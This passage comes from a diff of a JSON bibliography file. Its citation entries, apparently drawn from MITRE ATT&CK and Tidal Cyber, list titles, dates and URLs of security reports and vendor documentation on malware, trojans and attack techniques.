Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2015-04-01T00:00:00Z", + "refs": [ + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + ], + "source": "MITRE", + "title": "Malware Persistence on OS X Yosemite" + }, + "related": [], + "uuid": "7e3f3dda-c407-4b06-a6b0-8b72c4dad6e6", + "value": "RSAC 2015 San Francisco Patrick Wardle" + }, + { + "description": "Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017.", + "meta": { + "date_accessed": "2017-07-10T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" + ], + "source": "MITRE", + "title": "Malware Persistence on OS X Yosemite" + }, + "related": [], + "uuid": "d4e3b066-c439-4284-ba28-3b8bd8ec270e", + "value": "Malware Persistence on OS X" + }, + { + "description": "Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.", + "meta": { + "date_accessed": "2020-11-17T00:00:00Z", + "date_published": "2010-07-15T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html" + ], + "source": "MITRE", + "title": "Malware Persistence without the Windows Registry" + }, + "related": [], + "uuid": "536f9987-f3b6-4d5f-8a6b-32a0c651500d", + "value": "FireEye Hijacking July 2010" + }, + { + "description": "Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.", + "meta": { + "date_accessed": "2018-01-12T00:00:00Z", + "date_published": "2007-05-11T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/" + ], + "source": "MITRE", + "title": "Malware piggybacks on Windows’ Background Intelligent Transfer Service" + }, + "related": [], + "uuid": "7dd03a92-11b8-4b8a-9d34-082ecf09a6e4", + "value": "Mondok Windows PiggyBack BITS May 2007" + }, + { + "description": "Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.", + "meta": { + "date_accessed": "2021-02-18T00:00:00Z", + "date_published": "2016-04-26T00:00:00Z", + "refs": [ + "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + ], + "source": "MITRE", + "title": "Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary" + }, + "related": [], + "uuid": "83b8c3c4-d67a-48bd-8614-1c703a8d969b", + "value": "Conficker Nuclear Power Plant" + }, + { + "description": "MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.", + "meta": { + "date_accessed": "2021-06-03T00:00:00Z", + "date_published": "2012-10-03T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx" + ], + "source": "MITRE", + "title": "Malware signed with the Adobe code signing certificate" + }, + "related": [], + "uuid": "ef412bcd-54be-4972-888c-f5a2cdfb8d02", + "value": "MMPC ISAPI Filter 2012" + }, + { + "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.", + "meta": { + "date_accessed": "2021-03-11T00:00:00Z", + "date_published": "2020-05-29T00:00:00Z", + "refs": [ + "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf" + ], + "source": "MITRE", + "title": "MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”" + }, + "related": [], + "uuid": "09d8bb54-6fa5-4842-98aa-6e9656a19092", + "value": "Leonardo Turla Penquin May 2020" + }, + { + "description": "Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. Retrieved August 18, 2021.", + "meta": { + "date_accessed": "2021-08-18T00:00:00Z", + "date_published": "2009-01-15T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/" + ], + "source": "MITRE", + "title": "Malware Trying to Avoid Some Countries" + }, + "related": [], + "uuid": "3d4c5366-038a-453e-b803-a172b95da5f7", + "value": "Malware System Language Check" + }, + { + "description": "Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.", + "meta": { + "date_accessed": "2020-05-06T00:00:00Z", + "date_published": "2018-03-06T00:00:00Z", + "refs": [ + "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html" + ], + "source": "MITRE", + "title": "Malware “TSCookie”" + }, + "related": [], + "uuid": "ff1717f7-0d2e-4947-87d7-44576affe9f8", + "value": "JPCert TSCookie March 2018" + }, + { + "description": "Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.", + "meta": { + "date_accessed": "2018-01-12T00:00:00Z", + "date_published": "2007-05-09T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/malware-update-windows-update" + ], + "source": "MITRE", + "title": "Malware Update with Windows Update" + }, + "related": [], + "uuid": "e5962c87-0d42-46c2-8757-91f264fc570f", + "value": "Symantec BITS May 2007" + }, + { + "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.", + "meta": { + "date_accessed": "2020-05-06T00:00:00Z", + "date_published": "2019-09-18T00:00:00Z", + "refs": [ + "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html" + ], + "source": "MITRE", + "title": "Malware Used by BlackTech after Network Intrusion" + }, + "related": [], + "uuid": "26f44bde-f723-4854-8acc-3d95e5fa764a", + "value": "JPCert BlackTech Malware September 2019" + }, + { + "description": "Xingyu, J.. (2019, January 17). Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products. Retrieved May 26, 2020.", + "meta": { + "date_accessed": "2020-05-26T00:00:00Z", + "date_published": "2019-01-17T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/" + ], + "source": "MITRE", + "title": "Malware Used by Rocke Group Evolves to Evade Detection by Cloud Security Products" + }, + "related": [], + "uuid": "facf686b-a5a9-4c85-bb46-f56a434d3d78", + "value": "Unit 42 Rocke January 2019" + }, + { + "description": "LOLBAS. (2018, May 25). Manage-bde.wsf. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/" + ], + "source": "Tidal Cyber", + "title": "Manage-bde.wsf" + }, + "related": [], + "uuid": "74d5483e-2268-464c-a048-bb1f25bbfc4f", + "value": "Manage-bde.wsf - LOLBAS Project" + }, + { + "description": "Microsoft. (2022, February 18). Manage device identities by using the Azure portal. Retrieved April 13, 2022.", + "meta": { + "date_accessed": "2022-04-13T00:00:00Z", + "date_published": "2022-02-18T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal" + ], + "source": "MITRE", + "title": "Manage device identities by using the Azure portal" + }, + "related": [], + "uuid": "91aa3a4a-a852-40db-b6ec-68504670cfa6", + "value": "Microsoft Manage Device Identities" + }, + { + "description": "Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.", + "meta": { + "date_accessed": "2020-01-24T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-" + ], + "source": "MITRE", + "title": "Managed Object Format (MOF)" + }, + "related": [], + "uuid": "1d1da9ad-c995-4040-8103-b51af9d8bac3", + "value": "Microsoft MOF May 2018" + }, + { + "description": "Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.", + "meta": { + "date_accessed": "2021-06-11T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59" + ], + "source": "MITRE", + "title": "Manage email messages by using rules" + }, + "related": [], + "uuid": "91ce21f7-4cd5-4a75-a533-45d052a11c5d", + "value": "Microsoft Inbox Rules" + }, + { + "description": "Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "refs": [ + "https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project" + ], + "source": "MITRE", + "title": "Manage just-in-time privileged access to projects" + }, + "related": [], + "uuid": "797c6051-9dff-531b-8438-d306bdf46720", + "value": "Google Cloud Just in Time Access 2023" + }, + { + "description": "Microsoft. (2023, February 22). Manage mail flow rules in Exchange Online. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2023-02-22T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/manage-mail-flow-rules" + ], + "source": "MITRE", + "title": "Manage mail flow rules in Exchange Online" + }, + "related": [], + "uuid": "1d5d7353-7d9d-522a-a0aa-6f4aa0886ca1", + "value": "Microsoft Manage Mail Flow Rules 2023" + }, + { + "description": "Microsoft. (2022, March 4). Manage partner relationships. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "date_published": "2022-03-04T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/microsoft-365/commerce/manage-partners?view=o365-worldwide" + ], + "source": "MITRE", + "title": "Manage partner relationships" + }, + "related": [], + "uuid": "3d794f31-c3b4-4e0b-8558-b944d6616676", + "value": "Office 365 Partner Relationships" + }, + { + "description": "Microsoft. (n.d.). Manage Trusted Publishers. Retrieved March 31, 2016.", + "meta": { + "date_accessed": "2016-03-31T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc733026.aspx" + ], + "source": "MITRE", + "title": "Manage Trusted Publishers" + }, + "related": [], + "uuid": "e355ae20-4ada-49f3-a097-744838d6ff7d", + "value": "TechNet Trusted Publishers" + }, + { + "description": "Lich, B., Tobin, J., Hall, J. (2017, April 5). Manage Windows Defender Credential Guard. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "date_published": "2017-04-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage" + ], + "source": "MITRE", + "title": "Manage Windows Defender Credential Guard" + }, + "related": [], + "uuid": "dc95771b-db84-43ae-b9ee-6f0ef3f1c93d", + "value": "Microsoft Enable Cred Guard April 2017" + }, + { + "description": "N. O'Bryan. (2018, May 30). Managing Outlook Cached Mode and OST File Sizes. Retrieved February 19, 2020.", + "meta": { + "date_accessed": "2020-02-19T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/" + ], + "source": "MITRE", + "title": "Managing Outlook Cached Mode and OST File Sizes" + }, + "related": [], + "uuid": "6fbbb53f-cd4b-4ce1-942d-5cadb907cf86", + "value": "Outlook File Sizes" + }, + { + "description": "Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017.", + "meta": { + "date_accessed": "2017-12-21T00:00:00Z", + "refs": [ + "https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx" + ], + "source": "MITRE", + "title": "Managing WebDAV Security (IIS 6.0)" + }, + "related": [], + "uuid": "eeb7cd82-b116-4989-b3fa-968a23f839f3", + "value": "Microsoft Managing WebDAV Security" + }, + { + "description": "Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved January 10, 2016.", + "meta": { + "date_accessed": "2016-01-10T00:00:00Z", + "date_published": "2011-01-27T00:00:00Z", + "refs": [ + "https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf" + ], + "source": "MITRE", + "title": "Mandiant M-Trends 2011" + }, + "related": [], + "uuid": "563be052-29ac-4625-927d-84e475ef848e", + "value": "Mandiant M Trends 2011" + }, + { + "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2016-02-25T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf" + ], + "source": "MITRE", + "title": "Mandiant M-Trends 2016" + }, + "related": [], + "uuid": "f769a3ac-4330-46b7-bed8-61697e22cd24", + "value": "Mandiant M Trends 2016" + }, + { + "description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.", + "meta": { + "date_accessed": "2018-07-09T00:00:00Z", + "date_published": "2018-01-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Mandiant M-Trends 2018" + }, + "related": [], + "uuid": "71d3db50-4a20-4d8e-a640-4670d642205c", + "value": "FireEye APT35 2018" + }, + { + "description": "Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-US/library/aa375365" + ], + "source": "MITRE", + "title": "Manifests" + }, + "related": [], + "uuid": "e336dc02-c7bb-4046-93d9-17b9512fb731", + "value": "Microsoft Manifests" + }, + { + "description": "Microsoft. (n.d.). Manifests. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/aa375365" + ], + "source": "MITRE", + "title": "Manifests" + }, + "related": [], + "uuid": "a29301fe-0e3c-4c6e-85c5-a30a6bcb9114", + "value": "MSDN Manifests" + }, + { + "description": "Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.", + "meta": { + "date_accessed": "2018-01-10T00:00:00Z", + "date_published": "2017-10-28T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Man-in-the-browser" + ], + "source": "MITRE", + "title": "Man-in-the-browser" + }, + "related": [], + "uuid": "f8975da7-4c50-4b3b-8ecb-c99c9b3bc20c", + "value": "Wikipedia Man in the Browser" + }, + { + "description": "Kaspersky IT Encyclopedia. (n.d.). Man-in-the-middle attack. Retrieved September 1, 2023.", + "meta": { + "date_accessed": "2023-09-01T00:00:00Z", + "refs": [ + "https://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/" + ], + "source": "MITRE", + "title": "Man-in-the-middle attack" + }, + "related": [], + "uuid": "353a6eb9-54c5-5211-ad87-abf5d941e503", + "value": "Kaspersky Encyclopedia MiTM" + }, + { + "description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.", + "meta": { + "date_accessed": "2020-03-02T00:00:00Z", + "refs": [ + "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/" + ], + "source": "MITRE", + "title": "Man-in-the-Middle (MITM) Attacks" + }, + "related": [], + "uuid": "33b25966-0ab9-4cc6-9702-62263a23af9c", + "value": "Rapid7 MiTM Basics" + }, + { + "description": "Praetorian. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved October 8, 2021.", + "meta": { + "date_accessed": "2021-10-08T00:00:00Z", + "date_published": "2014-08-19T00:00:00Z", + "refs": [ + "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" + ], + "source": "MITRE", + "title": "Man-in-the-Middle TLS Protocol Downgrade Attack" + }, + "related": [], + "uuid": "4375602d-4b5f-476d-82f8-3cef84d3378e", + "value": "Praetorian TLS Downgrade Attack 2014" + }, + { + "description": "praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.", + "meta": { + "date_accessed": "2021-12-08T00:00:00Z", + "date_published": "2014-08-19T00:00:00Z", + "refs": [ + "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/" + ], + "source": "MITRE", + "title": "Man-in-the-Middle TLS Protocol Downgrade Attack" + }, + "related": [], + "uuid": "af907fe1-1e37-4f44-8ad4-fcc3826ee6fb", + "value": "mitm_tls_downgrade_att" + }, + { + "description": "Warren, J. (2017, July 11). Manipulating User Passwords with Mimikatz. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "date_published": "2017-07-11T00:00:00Z", + "refs": [ + "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM" + ], + "source": "MITRE", + "title": "Manipulating User Passwords with Mimikatz" + }, + "related": [], + "uuid": "3bf24c68-fc98-4143-9dff-f54030c902fe", + "value": "InsiderThreat ChangeNTLM July 2017" + }, + { + "description": "Starikova, A. (2023, February 14). Man-on-the-side – peculiar attack. Retrieved September 1, 2023.", + "meta": { + "date_accessed": "2023-09-01T00:00:00Z", + "date_published": "2023-02-14T00:00:00Z", + "refs": [ + "https://usa.kaspersky.com/blog/man-on-the-side/27854/" + ], + "source": "MITRE", + "title": "Man-on-the-side – peculiar attack" + }, + "related": [], + "uuid": "8ea545ac-cca6-5da5-8a93-6b07518fc9d4", + "value": "Kaspersky ManOnTheSide" + }, + { + "description": "Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.", + "meta": { + "date_accessed": "2021-10-17T00:00:00Z", + "date_published": "2020-07-14T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/" + ], + "source": "MITRE", + "title": "Manufacturing Industry in the Adversaries’ Crosshairs" + }, + "related": [], + "uuid": "5ed6a702-dcc5-4021-95cc-5b720dbd8774", + "value": "CrowdStrike Manufacturing Threat July 2020" + }, + { + "description": "US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.", + "meta": { + "date_accessed": "2018-07-13T00:00:00Z", + "date_published": "2018-06-14T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A" + ], + "source": "MITRE", + "title": "MAR-10135536-12 – North Korean Trojan: TYPEFRAME" + }, + "related": [], + "uuid": "b89f20ad-39c4-480f-b02e-20f4e71f6b95", + "value": "US-CERT TYPEFRAME June 2018" + }, + { + "description": "US-CERT. (2018, August 09). MAR-10135536-17 – North Korean Trojan: KEYMARBLE. Retrieved August 16, 2018.", + "meta": { + "date_accessed": "2018-08-16T00:00:00Z", + "date_published": "2018-08-09T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + ], + "source": "MITRE", + "title": "MAR-10135536-17 – North Korean Trojan: KEYMARBLE" + }, + "related": [], + "uuid": "b30dd720-a85d-4bf5-84e1-394a27917ee7", + "value": "US-CERT KEYMARBLE Aug 2018" + }, + { + "description": "US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "date_published": "2019-04-10T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" + ], + "source": "MITRE", + "title": "MAR-10135536-8 – North Korean Trojan: HOPLIGHT" + }, + "related": [], + "uuid": "e722b71b-9042-4143-a156-489783d86e0a", + "value": "US-CERT HOPLIGHT Apr 2019" + }, + { + "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020.", + "meta": { + "date_accessed": "2020-05-01T00:00:00Z", + "date_published": "2020-02-20T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d" + ], + "source": "MITRE", + "title": "MAR-10271944-1.v1 – North Korean Trojan: HOTCROISSANT" + }, + "related": [], + "uuid": "db5c816a-2a23-4966-8f0b-4ec86cae45c9", + "value": "US-CERT HOTCROISSANT February 2020" + }, + { + "description": "USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.", + "meta": { + "date_accessed": "2021-03-05T00:00:00Z", + "date_published": "2020-05-12T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b" + ], + "source": "MITRE", + "title": "MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE" + }, + "related": [], + "uuid": "b9946fcc-592a-4c54-b504-4fe5050704df", + "value": "CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020" + }, + { + "description": "CISA, FBI, DOD. (2021, August). MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2021-08-01T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a" + ], + "source": "MITRE", + "title": "MAR-10292089-1.v2 – Chinese Remote Access Trojan: TAIDOOR" + }, + "related": [], + "uuid": "0ae18fda-cc88-49f4-8e85-7b63044579ea", + "value": "CISA MAR-10292089-1.v2 TAIDOOR August 2021" + }, + { + "description": "US-CERT. (2020, August 19). MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020.", + "meta": { + "date_accessed": "2020-08-19T00:00:00Z", + "date_published": "2020-08-19T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a" + ], + "source": "MITRE", + "title": "MAR-10295134-1.v1 – North Korean Remote Access Trojan: BLINDINGCAN" + }, + "related": [], + "uuid": "0421788c-b807-4e19-897c-bfb4323feb16", + "value": "US-CERT BLINDINGCAN Aug 2020" + }, + { + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.", + "meta": { + "date_accessed": "2020-09-29T00:00:00Z", + "date_published": "2020-07-16T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a" + ], + "source": "MITRE", + "title": "MAR-10296782-1.v1 – SOREFANG" + }, + "related": [], + "uuid": "a87db09c-cadc-48fd-9634-8dd44bbd9009", + "value": "CISA SoreFang July 2016" + }, + { + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.", + "meta": { + "date_accessed": "2020-09-24T00:00:00Z", + "date_published": "2020-07-16T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b" + ], + "source": "MITRE", + "title": "MAR-10296782-2.v1 – WELLMESS" + }, + "related": [], + "uuid": "40e9eda2-51a2-4fd8-b0b1-7d2c6deca820", + "value": "CISA WellMess July 2020" + }, + { + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.", + "meta": { + "date_accessed": "2020-09-29T00:00:00Z", + "date_published": "2020-07-16T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c" + ], + "source": "MITRE", + "title": "MAR-10296782-3.v1 – WELLMAIL" + }, + "related": [], + "uuid": "2f33b88a-a8dd-445b-a34f-e356b94bed35", + "value": "CISA WellMail July 2020" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2020, August 26). MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON. Retrieved March 18, 2021.", + "meta": { + "date_accessed": "2021-03-18T00:00:00Z", + "date_published": "2020-08-26T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-239a" + ], + "source": "MITRE", + "title": "MAR-10301706-1.v1 - North Korean Remote Access Tool: ECCENTRICBANDWAGON" + }, + "related": [], + "uuid": "a1b143f9-ca85-4c11-8909-49423c9ffeab", + "value": "CISA EB Aug 2020" + }, + { + "description": "CISA. (2019, February 27). MAR-17-352-01 HatMan-Safety System Targeted Malware. Retrieved January 6, 2021.", + "meta": { + "date_accessed": "2021-01-06T00:00:00Z", + "date_published": "2019-02-27T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + ], + "source": "MITRE", + "title": "MAR-17-352-01 HatMan-Safety System Targeted Malware" + }, + "related": [], + "uuid": "0690fa53-fee4-43fa-afd5-61137fd7529e", + "value": "CISA HatMan" + }, + { + "description": "Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2020-03-30T00:00:00Z", + "refs": [ + "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/" + ], + "source": "MITRE", + "title": "Mark-of-the-Web from a red team’s perspective" + }, + "related": [], + "uuid": "54d9c59f-800a-426f-90c8-0d1cb2bea1ea", + "value": "Outflank MotW 2020" + }, + { + "description": "Tal, Nati. (2022, December 28). “MasquerAds” — Google’s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs and Crypto Wallets. Retrieved February 21, 2023.", + "meta": { + "date_accessed": "2023-02-21T00:00:00Z", + "date_published": "2022-12-28T00:00:00Z", + "refs": [ + "https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e" + ], + "source": "MITRE", + "title": "“MasquerAds” — Google’s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs and Crypto Wallets" + }, + "related": [], + "uuid": "e11492f4-f9a3-5489-b2bb-a28b19ef88b5", + "value": "Masquerads-Guardio" + }, + { + "description": "Ng, A. (2019, January 17). Massive breach leaks 773 million email addresses, 21 million passwords. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-01-17T00:00:00Z", + "refs": [ + "https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/" + ], + "source": "MITRE", + "title": "Massive breach leaks 773 million email addresses, 21 million passwords" + }, + "related": [], + "uuid": "46df3a49-e7c4-4169-b35c-0aecc78c31ea", + "value": "CNET Leaks" + }, + { + "description": "Goodin, D.. (2015, March 31). Massive denial-of-service attack on GitHub tied to Chinese government. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "date_published": "2015-03-31T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/" + ], + "source": "MITRE", + "title": "Massive denial-of-service attack on GitHub tied to Chinese government" + }, + "related": [], + "uuid": "1a08d58f-bf91-4345-aa4e-2906d3ef365a", + "value": "ArsTechnica Great Firewall of China" + }, + { + "description": "Europol. (2018, March 26). Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain. Retrieved October 10, 2018.", + "meta": { + "date_accessed": "2018-10-10T00:00:00Z", + "date_published": "2018-03-26T00:00:00Z", + "refs": [ + "https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain" + ], + "source": "MITRE", + "title": "Mastermind Behind EUR 1 Billion Cyber Bank Robbery Arrested in Spain" + }, + "related": [], + "uuid": "f9d1f2ab-9e75-48ce-bcdf-b7119687feef", + "value": "Europol Cobalt Mar 2018" + }, + { + "description": "LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/" + ], + "source": "MITRE", + "title": "Mavinject.exe" + }, + "related": [], + "uuid": "4ba7fa89-006b-4fbf-aa6c-6775842c97a4", + "value": "LOLBAS Mavinject" + }, + { + "description": "Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2018-05-29T00:00:00Z", + "refs": [ + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e" + ], + "source": "MITRE", + "title": "mavinject.exe Functionality Deconstructed" + }, + "related": [], + "uuid": "17b055ba-5e59-4508-ba77-2519c03c6d65", + "value": "Mavinject Functionality Deconstructed" + }, + { + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020.", + "meta": { + "date_accessed": "2020-10-09T00:00:00Z", + "date_published": "2020-09-17T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/" + ], + "source": "MITRE", + "title": "Maze Attackers Adopt Ragnar Locker Virtual Machine Technique" + }, + "related": [], + "uuid": "9c4bbcbb-2c18-453c-8b02-0a0cd512c3f3", + "value": "Sophos Maze VM September 2020" + }, + { + "description": "ARMmbed. (2018, June 21). Mbed Crypto. Retrieved February 15, 2021.", + "meta": { + "date_accessed": "2021-02-15T00:00:00Z", + "date_published": "2018-06-21T00:00:00Z", + "refs": [ + "https://github.com/ARMmbed/mbed-crypto" + ], + "source": "MITRE", + "title": "Mbed Crypto" + }, + "related": [], + "uuid": "324ba1b8-cc97-4d20-b25d-053b2462f3b2", + "value": "mbed-crypto" + }, + { + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.", + "meta": { + "date_accessed": "2020-08-05T00:00:00Z", + "date_published": 